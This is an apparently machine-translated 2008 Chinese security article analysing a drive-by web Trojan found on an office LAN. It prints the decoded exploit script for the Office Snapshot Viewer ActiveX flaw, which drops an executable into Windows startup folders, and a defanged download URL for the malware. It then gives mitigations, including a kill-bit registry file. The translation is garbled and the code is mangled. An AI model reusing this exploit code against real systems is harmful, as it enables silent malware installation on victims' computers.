No Ding for? Teach you interdiction the latest Office vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200819835
Type myhack58
Reporter 佚名
Modified 2008-07-27T00:00:00


Friends in a 3D training computer training company when the network management internship, a temporary home for a few days, find me instead of his work for a few days. This company belongs to the medium scale, through a router to form the LAN, probably a 2 0 0 more than one PC, 10M fiber access, but the speed is surprisingly slow, every computer has installed an antivirus software plus an ARP firewall ARP firewall often pop-up prompts 1 9 2. 1 6 8. 1. 1 0 2 rounds to attack, it is clear that computers caught up, attack the Global domain network leads to the Internet speed is very slow. Each machine also nothing important things, mainly the above is to run some 3D software. Lock this computer IP, found this computer, a temporary call to use this computer for my computer.

Open the IE found that the home page has been tampered with, damaged or unknown web page, antivirus and firewall also hit does not open, open some programs prompt a software error(like is already infected), it seems that in a lot of BT virus, if you manually kill the poison, I'm afraid need some time. In the General case, where the machine had been poisoned basically use GHOST to re-install, it seems this machine is also to be so, save time, anyway inside also nothing important data. But before reloading analytically clear, is what reason let this machine poisoning, since people here usually don't download what software, since the software is a Trojan bundled poisoning probability is very low, most of is browsing which web page leads to.

First disconnect the local connection, a pop-up web page find the following code: Figure 1

Figure 1

A look that hung it, put this page through another machine with the thunder put this page download down, to see a bunch of code:

Figure 2

Is the custom function to encrypt the web Trojan, the encryption Code of the above there is a eval function the eval into a document. write to save the post directly open this page, to obtain a first decrypted. As follows: Figure 3

Figure 3

1 copy the above to decrypt the code, then create a second page, the document. write(t)into the document. getElementById('textfield'). value=t;, in the web page the following is written on the<form id="form1" name="form1" method="post" action=""> 2<label> 3<textarea name="textfield" cols="1 0 0" rows="5 0"></textarea> 4</label> 5</form>

Note that the textfield with the document. getElementById('textfield'). value=t;where textfield is corresponding. After opening this page, to obtain the final decryption result. Figure 4

Posted the complete code is as follows:

1<script type="text/javascript"> 2function killErrors() { 3return true; 4} 5window. onerror = killErrors; 6 7var x; 8var obj; 9var mycars = new Array(); 10mycars[0] = "c:/Program Files/Outlook Express/wab.exe"; 11mycars[1] = "d:/Program Files/Outlook Express/wab.exe"; 12mycars[2] = "e:/Program Files/Outlook Express/wab.exe"; 13mycars[3] = "C:/Documents and Settings/All Users/"Start"菜单 / 程序 / 启动 /Thunder.exe"; 14mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe"; 1 5 16var objlcx = new ActiveXObject("snpvw. Snapshot Viewer Control. 1"); 1 7 18if(objlcx="[object]") 1 9{ 2 0 21setTimeout('the window. location = "ldap://"',3 0 0 0 2 6 27var buf1 = 'hxxp://'; 28var buf2=mycars[x]; 2 9 30obj. Zoom = 0; 31obj. ShowNavigationButtons = false; 32obj. AllowContextMenu = false; 33obj. SnapshotPath = buf1; 3 4 35try 3 6{ 3 7 obj. CompressedPath = buf2; 3 8 obj. PrintSnapshot(); 3 9 4 0}catch(e){} 4 1 4 2} 4 3} 4 4 4 5</script>

Wherein the http replaced with hxxp to prevent accidental.

Obviously, this is the Microsoft Office Snapshot Viewer ActiveX exploit code, is Office series software Access vulnerabilities, this vulnerability affects Microsoft Access version 2 0 0 3 and 2 0 0 2 and 2 0 0 0, if only to install the Microsoft Snapshot Viewer 10.0.4622 program, also have the vulnerability. It is no wonder that this loophole will make the play all-patch system for the recruitment, the current official did not give a patch, in fact the world simply does not hit all patches of the system. We see in the code there is this code:

1mycars[0] = "c:/Program Files/Outlook Express/wab.exe"; 2mycars[1] = "d:/Program Files/Outlook Express/wab.exe"; 3mycars[2] = "e:/Program Files/Outlook Express/wab.exe"; 4mycars[3] = "C:/Documents and Settings/All Users/"Start"菜单 / 程序 / 启动 /Thunder.exe"; 5mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";

As can be seen, the exploits of persons like to make use of the way, mycars[0] = "c:/Program Files/Outlook Express/wab.exe";mycars[1] = "d:/Program Files/Outlook Express/wab.exe";mycars[2] = "e:/Program Files/Outlook Express/wab.exe";this is to be able to trigger directly run malicious programs use ways, and then two sentences, one is written to the startup items, one is written to the thunder boot from the start. Even say even if not directly trigger the vulnerability to run, write in the boot inside, the boot after the malicious program will quietly run. While the code in this sentence hxxp://jijiks8ahsda. cn/9/ck. exe is FORTUNE download malicious programs to address. Currently this exploit code has been in the online spread, while the antivirus software that comes with the vulnerability update procedure does not meet this official is given this loophole patch.

Author GHOST after system after system comes with OFFICE2003, this hxxp://jijiks8ahsda. cn/9/ck. ex replaced with a self-written VB small program in person at the local test about this vulnerability, run the page after the pop up the program window, and in the startup items found in the VB applet. The vulnerability for not doingthe security guardof the user in the horse the probability is very high, and finally made under the global Area NetworkSecurity.

First set the IE security level on all machines the INTERNET Security level set to“high”, then in the Restricted sites add the site, was added to the malicious sites. Then by disabling the COM components of the installation package, to disable the vulnerability is triggered, it can only be a temporary solution. Copy the following code into Notepad.

1Windows Registry Editor Version 5.00 2[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50- 3368C-11D0-AD81-00A0C90DC8D9}] 4"Compatibility Flags"=dword:0 0 0 0 0 4 0 0 5[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60- 6368C-11D0-AD81-00A0C90DC8D9}] 7"Compatibility Flags"=dword:0 0 0 0 0 4 0 0 8[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210- 9368C-11D0-AD81-00A0C90DC8D9}] 1 0"Compatibility Flags"=dword:0 0 0 0 0 4 0 0 To put it assafe. reg in the Global domain network on all machines execute, import the registry, so you to manually disable a COM component installation package. Finally, open all the machines on the antivirus web Trojan to intercept the function, wait for the official patch comes out, quickly hit on the patch.